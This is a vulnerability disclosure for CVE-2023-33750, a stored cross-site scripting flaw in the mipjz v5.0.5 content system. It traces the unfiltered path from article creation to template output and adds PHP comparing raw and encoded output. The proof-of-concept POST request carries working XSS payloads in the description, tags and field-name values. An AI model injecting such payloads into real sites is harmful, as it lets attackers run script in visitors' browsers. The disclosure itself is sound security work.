CVE-2023-33750: A cross site scripting (XSS) vulnerability exists in mipjz v5.0.5 · Issue #15 · sansanyun/mipjz

A stored cross-site scripting (XSS) vulnerability in mipjz v5.0.5 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Description parameter at /index.php?s=/article/ApiAdminArticle/itemAdd.


[Vulnerability Description]
A cross-site scripting (XSS) vulnerability exists in mipjz v5.0.5; attackers can execute arbitrary code via the article description field from /article/ApiAdminArticle/itemAdd.

[Vulnerability Type]
Cross Site Scripting (XSS)

[Vendor of Product]
https://github.com/sansanyun/mipjz
http://www.mipjz.com/

[Affected Product Code Base]
v5.0.5

[Vulnerability Proof]

  1. Add an article, insert js code in the description parameter: xss

    POST /index.php?s=/article/ApiAdminArticle/itemAdd HTTP/1.1
    Host: 192.168.11.102
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
    Accept: application/json, text/plain, */*
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/json;charset=utf-8
    dataId:
    Content-Length: 426
    Origin: http://192.168.11.102
    Connection: close
    Referer: http://192.168.11.102/index.php?s=/admin/
    Cookie: csrf_49dccd=65bc5ef8; Hm_lvt_3155433929be1afd6cef849b9709d4d7=1684330392; Hm_lpvt_3155433929be1afd6cef849b9709d4d7=1684330392; PHPSESSID=rtdn09cuqpvt4chfomi043aun0

    {"title":"xss","keywords":"123","description":"xss<img src onerror=alert(22)>","link_tags":"","url_name":"","content":"<p>123<br></p>","is_recommend":"0","tags":"xss<img src onerror=alert(1)>","publish_time":"","fieldList":"[{"value":"","key":"diy_aaa","name":"<img src onerror=alert(1)>"}]","img_url":"/public/uploads/temp/2023/05/17/6464f65ca6526.jpg"}

  2. Visit the article page, the code is loaded and executed

[Code Details]

  1. Add an article, receive the parameters, and pass them to \app\article\model\Articles.php:itemAdd for processing

  2. \app\article\model\Articles.php:itemAdd does not check and filter the description, and directly stores it in the database

  3. Article Details \app\article\controller\ArticleDetail.php:index takes out the article description in the database and passes it to $mipDescription without filtering

  4. In the “guess you like” area of the article display \template\default\article\articleDetail.html, directly output the $mipDescription from the previous step, causing the malicious code to be executed
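As an added illustration of steps 3 and 4 (this is not code from mipjz or from the issue author), the unescaped output pattern the report describes is shown beside an output-encoded version; the function names are hypothetical and the input is the description value from the request above.

```php
<?php
// Added example, not mipjz code: contrasts raw output of a stored description
// with HTML-body-context encoding at the point of output.
declare(strict_types=1);

/** Vulnerable pattern: the stored description is placed into the HTML as-is. */
function renderDescriptionUnsafe(string $mipDescription): string
{
    return '<p class="desc">' . $mipDescription . '</p>';
}

/** Hardened pattern: encode for the HTML-body context when rendering. */
function renderDescriptionSafe(string $mipDescription): string
{
    $encoded = htmlspecialchars(
        $mipDescription,
        ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5,
        'UTF-8'
    );
    return '<p class="desc">' . $encoded . '</p>';
}

/**
 * Review check: does a rendered fragment still contain a real tag other than
 * the <p> wrapper? Encoded output has no '<' left, so it passes.
 */
function containsForeignTag(string $html): bool
{
    return (bool) preg_match('/<(?!\/?p\b)[a-z]/i', $html);
}

// Constructed input: the description value from the proof-of-concept request.
$stored = 'xss<img src onerror=alert(22)>';

$unsafe = renderDescriptionUnsafe($stored);   // <img ...> reaches the browser
$safe   = renderDescriptionSafe($stored);     // &lt;img ...&gt; is inert text

echo "unsafe: {$unsafe}\n";
echo "safe:   {$safe}\n";
var_dump(containsForeignTag($unsafe));
var_dump(containsForeignTag($safe));
```

Encoding at output, as in renderDescriptionSafe, closes the sink regardless of what itemAdd stores; input filtering alone would still leave the template as a second place to get wrong.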
